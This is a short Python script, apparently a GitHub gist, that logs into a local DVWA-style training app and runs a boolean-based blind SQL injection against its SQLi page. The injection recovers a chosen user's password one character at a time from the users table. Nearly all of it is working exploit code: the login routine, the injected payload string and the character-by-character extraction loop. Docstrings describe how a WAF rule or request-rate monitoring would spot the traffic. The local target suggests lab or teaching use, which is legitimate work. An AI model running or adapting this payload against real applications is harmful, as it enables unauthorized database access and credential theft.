@Adikso
Last active May 9, 2020 22:33
import urllib
import string
import re
import sys
import requests
# All requests go to a local test instance and share one Session so that
# cookies set during login() are reused by the later probes.
base_url = 'http://localhost:1337'
session = requests.Session()
def login():
    """Authenticate the shared ``session`` against the local test instance.

    Fetches ``/login.php``, pulls the hidden ``user_token`` value out of the
    HTML (presumably an anti-CSRF token — the form is not shown here) and
    posts the fixed credentials together with it. Neither response is
    checked: a missing token raises ``AttributeError`` from the regex match,
    and a rejected login is only noticed later when probes stop returning the
    expected content.
    """
    login_url = base_url + '/login.php'
    page = session.get(login_url)
    token_match = re.search(r"name=\'user_token\' value=\'([a-z0-9]+)", page.text)
    form = {
        'username': 'admin',
        'password': 'password',
        'Login': 'Login',
        'user_token': token_match.group(1),
    }
    session.post(login_url, data=form)
def attempt(username: str, text: str) -> bool:
    """Send one boolean-based blind probe and report whether it matched.

    The ``id`` value closes the quoted literal the server presumably wraps it
    in and appends an OR subquery on ``users``: it is true when the first row
    (``limit 1``) whose ``password`` LIKE-matches the prefix ``text`` has
    ``user`` equal to ``username``. The oracle is not an error page but the
    presence of the literal ``First name:`` in the response body.

    Detection notes: every probe carries the literal
    ``select user from users where password like`` inside the ``id`` query
    parameter of a GET to ``/vulnerabilities/sqli/``, so a query-log or WAF
    rule on that substring, or on a burst of near-identical requests from one
    session differing only in the ``like`` prefix, surfaces this traffic.

    NOTE(review): ``urllib.parse`` is used although the file only does
    ``import urllib``; this works only if another import (likely ``requests``)
    has already loaded the submodule.
    """
    # ``%`` is the LIKE wildcard, so ``text`` is matched as a prefix.
    payload = "-1'<@=1 OR (select user from users where password like '" + text + "%' limit 1)='" + username
    url = base_url + "/vulnerabilities/sqli/?Submit=Submit&" + urllib.parse.urlencode({
        "id": payload
    })
    r = session.get(url)
    # Byte comparison on the raw body; the page text is never parsed.
    return b'First name: ' in r.content
def leak_password(username: str) -> str:
    """Rebuild ``username``'s password one character at a time via ``attempt``.

    For each of up to 32 positions, tries every lowercase letter and digit
    and keeps the first candidate ``attempt`` confirms. The alphabet has no
    uppercase, punctuation or whitespace, so a password containing any such
    character stops growing at that position: no candidate matches, ``break``
    is never reached, and every later position re-runs the same 36 failing
    probes before the partial prefix is returned. Worst case is therefore
    32 * 36 = 1152 requests for one username, all within one session, which
    is the volume signature a rate-based detection would see.
    """
    password = ""
    for offset in range(32):
        for letter in string.ascii_lowercase + string.digits:
            if attempt(username, password + letter):
                password += letter
                # Only leaves the inner loop; the outer loop always runs 32 times.
                break
    # May be a prefix rather than the full value (see docstring).
    return password
if __name__ == '__main__':
    # Usage: script.py <username>; prints "<username>:<recovered value>".
    target_user = sys.argv[1]
    login()
    print(target_user + ':' + leak_password(target_user))